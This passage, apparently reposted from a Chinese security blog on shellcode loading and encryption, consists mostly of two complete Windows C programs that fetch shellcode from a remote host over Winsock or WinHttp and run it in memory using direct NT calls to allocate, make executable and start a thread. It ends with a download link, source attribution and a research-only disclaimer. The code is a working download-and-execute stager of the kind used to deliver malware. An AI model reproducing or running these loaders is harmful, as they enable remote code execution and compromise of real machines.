(LPTHREAD_START_ROUTINE)BaseAddress,NULL, FALSE,NULL,NULL,NULL,NULL);if(!NT_SUCCESS(NtCreateThreadstatus)) {printf("[!] Failed in sysNtCreateThreadEx (%u)n", GetLastError());return;}LARGE_INTEGER Timeout;Timeout.QuadPart =-10000000;NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);if(!NT_SUCCESS(NTWFSOstatus)) {printf("[!] Failed in sysNtWaitForSingleObject (%u)n", GetLastError());return;}}voidgetShellcode_Run(char* host,char* port,char* resource){DWORD oldp =0;BOOL returnValue;size_torigsize =strlen(host) +1;constsize_tnewsize =100;size_tconvertedChars =0;wchar_tWhost[newsize];mbstowcs_s(&convertedChars, Whost, origsize, host, _TRUNCATE);WSADATA wsaData;SOCKET ConnectSocket = INVALID_SOCKET;structaddrinfo*result=NULL,*ptr=NULL,hints;charsendbuf[MAX_PATH] ="";lstrcatA(sendbuf,"GET /");lstrcatA(sendbuf, resource);charrecvbuf[DEFAULT_BUFLEN];memset(recvbuf,0, DEFAULT_BUFLEN);intiResult;intrecvbuflen = DEFAULT_BUFLEN;// Initialize WinsockiResult = WSAStartup(MAKEWORD(2,2), &wsaData);if(iResult !=0) {printf("WSAStartup failed with error: %dn", iResult);return;}ZeroMemory(&hints,sizeof(hints));hints.ai_family = PF_INET;hints.ai_socktype = SOCK_STREAM;hints.ai_protocol = IPPROTO_TCP;// Resolve the server address and portiResult = getaddrinfo(host, port, &hints, &result);if(iResult !=0) {printf("getaddrinfo failed with error: %dn", iResult);WSACleanup();return;}// Attempt to connect to an address until one succeedsfor(ptr = result; ptr !=NULL; ptr = ptr->ai_next) {// Create a SOCKET for connecting to serverConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,ptr->ai_protocol);if(ConnectSocket == INVALID_SOCKET) {printf("socket failed with error: %ldn", WSAGetLastError());WSACleanup();return;}// Connect to server.printf("[+] Connect to %s:%s", host, port);iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);if(iResult == SOCKET_ERROR) {closesocket(ConnectSocket);ConnectSocket = INVALID_SOCKET;continue;}break;}freeaddrinfo(result);if(ConnectSocket == INVALID_SOCKET) {printf("Unable to connect to server!n");WSACleanup();return;}// Send an initial bufferiResult = send(ConnectSocket, sendbuf, (int)strlen(sendbuf),0);if(iResult == SOCKET_ERROR) {printf("send failed with error: %dn", WSAGetLastError());closesocket(ConnectSocket);WSACleanup();return;}printf("n[+] Sent %ld Bytesn", iResult);// shutdown the connection since no more data will be sentiResult = shutdown(ConnectSocket, SD_SEND);if(iResult == SOCKET_ERROR) {printf("shutdown failed with error: %dn", WSAGetLastError());closesocket(ConnectSocket);WSACleanup();return;}// Receive until the peer closes the connectiondo{iResult = recv(ConnectSocket, (char*)recvbuf, recvbuflen,0);if(iResult >0)printf("[+] Received %d Bytesn", iResult);elseif(iResult ==0)printf("[+] Connection closedn");elseprintf("recv failed with error: %dn", WSAGetLastError());RunShellcode(recvbuf, recvbuflen);}while(iResult >0);// cleanupclosesocket(ConnectSocket);WSACleanup();}intmain(intargc,char** argv){// Validate the parametersif(argc !=4) {printf("[+] Usage: %s <RemoteIP> <RemotePort> <Resource>n", argv[0]);return1;}getShellcode_Run(argv[1], argv[2], argv[3]);return0;}
4-2、Using WinHttp:
EXTERN_C NTSTATUSNtAllocateVirtualMemory(HANDLE ProcessHandle,PVOID* BaseAddress,ULONG_PTR ZeroBits,PSIZE_T RegionSize,ULONG AllocationType,ULONG Protect);EXTERN_C NTSTATUSNtProtectVirtualMemory(IN HANDLE ProcessHandle,IN OUT PVOID* BaseAddress,IN OUT PSIZE_T RegionSize,IN ULONG NewProtect,OUT PULONG OldProtect);EXTERN_C NTSTATUSNtCreateThreadEx(OUT PHANDLE hThread,IN ACCESS_MASK DesiredAccess,IN PVOID ObjectAttributes,IN HANDLE ProcessHandle,IN PVOID lpStartAddress,IN PVOID lpParameter,IN ULONG Flags,IN SIZE_T StackZeroBits,IN SIZE_T SizeOfStackCommit,IN SIZE_T SizeOfStackReserve,OUT PVOID lpBytesBuffer);EXTERN_C NTSTATUSNtWaitForSingleObject(IN HANDLE Handle,IN BOOLEAN Alertable,IN PLARGE_INTEGER Timeout);voidRunShellcode(char* shellcode, DWORD shellcodeLen){PVOID BaseAddress =NULL;SIZE_T dwSize2 =0x2000;PCSTR Terminator =NULL;NTSTATUS STATUS;NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress,0, &dwSize2, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if(!NT_SUCCESS(status1)) {return;}RtlMoveMemory(BaseAddress, shellcode, shellcodeLen);HANDLE hThread;DWORD OldProtect =0;NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, &dwSize2, PAGE_EXECUTE_READ, &OldProtect);if(!NT_SUCCESS(NtProtectStatus1)) {return;}printf("nnShellcode_mem : %pnn", BaseAddress);getchar();HANDLE hHostThread = INVALID_HANDLE_VALUE;NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread,0x1FFFFF,NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress,NULL, FALSE,NULL,NULL,NULL,NULL);if(!NT_SUCCESS(NtCreateThreadstatus)) {printf("[!] Failed in sysNtCreateThreadEx (%u)n", GetLastError());return;}LARGE_INTEGER Timeout;Timeout.QuadPart =-10000000;NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);if(!NT_SUCCESS(NTWFSOstatus)) {printf("[!] Failed in sysNtWaitForSingleObject (%u)n", GetLastError());return;}}voidgetShellcode_Run(wchar_t* whost, DWORD port,wchar_t* wresource){DWORD dwSize =0;DWORD dwDownloaded =0;LPSTR pszOutBuffer =NULL;BOOL bResults = FALSE;HINTERNET hSession =NULL,hConnect =NULL,hRequest =NULL;// Use WinHttpOpen to obtain a session handle.hSession = WinHttpOpen(L"WinHTTP Example/1.0",WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS,0);// Specify an HTTP server.if(hSession)hConnect = WinHttpConnect(hSession, whost, port,0);elseprintf("Failed in WinHttpConnect (%u)n", GetLastError());// Create an HTTP request handle.if(hConnect)hRequest = WinHttpOpenRequest(hConnect,L"GET", wresource,NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES,NULL);elseprintf("Failed in WinHttpOpenRequest (%u)n", GetLastError());// Send a request.if(hRequest)bResults = WinHttpSendRequest(hRequest,WINHTTP_NO_ADDITIONAL_HEADERS,0, WINHTTP_NO_REQUEST_DATA,0,0,0);elseprintf("Failed in WinHttpSendRequest (%u)n", GetLastError());// End the request.if(bResults)bResults = WinHttpReceiveResponse(hRequest,NULL);elseprintf("Failed in WinHttpReceiveResponse (%u)n", GetLastError());// Keep checking for data until there is nothing left.if(bResults)do{// Check for available data.dwSize =0;if(!WinHttpQueryDataAvailable(hRequest, &dwSize))printf("Error %u in WinHttpQueryDataAvailable (%u)n", GetLastError());// Allocate space for the buffer.pszOutBuffer =newchar[dwSize +1];if(!pszOutBuffer){printf("Out of memoryn");dwSize =0;}else{// Read the Data.ZeroMemory(pszOutBuffer, dwSize +1);if(!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer,dwSize, &dwDownloaded))printf("Error %u in WinHttpReadData.n", GetLastError());else{// Run the shellcodeRunShellcode(pszOutBuffer, dwSize +1);}}}while(dwSize >0);// Report any errors.if(!bResults)printf("Error %d has occurred.n", GetLastError());// Close any open handles.if(hRequest) WinHttpCloseHandle(hRequest);if(hConnect) WinHttpCloseHandle(hConnect);if(hSession) WinHttpCloseHandle(hSession);}intmain(intargc,char** argv){// Validate the parametersif(argc !=4) {printf("[+] Usage: %s <RemoteIP> <RemotePort> <Resource>n", argv[0]);return1;}char* host = argv[1];DWORD port = atoi(argv[2]);char* resource = argv[3];constsize_tcSize1 =strlen(host) +1;wchar_t* whost =newwchar_t[cSize1];mbstowcs(whost, host, cSize1);constsize_tcSize2 =strlen(resource) +1;wchar_t* wresource =newwchar_t[cSize2];mbstowcs(wresource, resource, cSize2);getShellcode_Run(whost, port, wresource);return0;}
下址地址:
链接:https://pan.baidu.com/s/1aQkt93RPdFVR3wj0V13d4w提取码:9g8j
题外话:用 VS2022-V17.5编译,果然如网上介绍的那样,超快,满意!
文章来源:MicroPest
原文始发于微信公众号(渗透Xiao白帽):一组shellcode加密方式(附源码)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论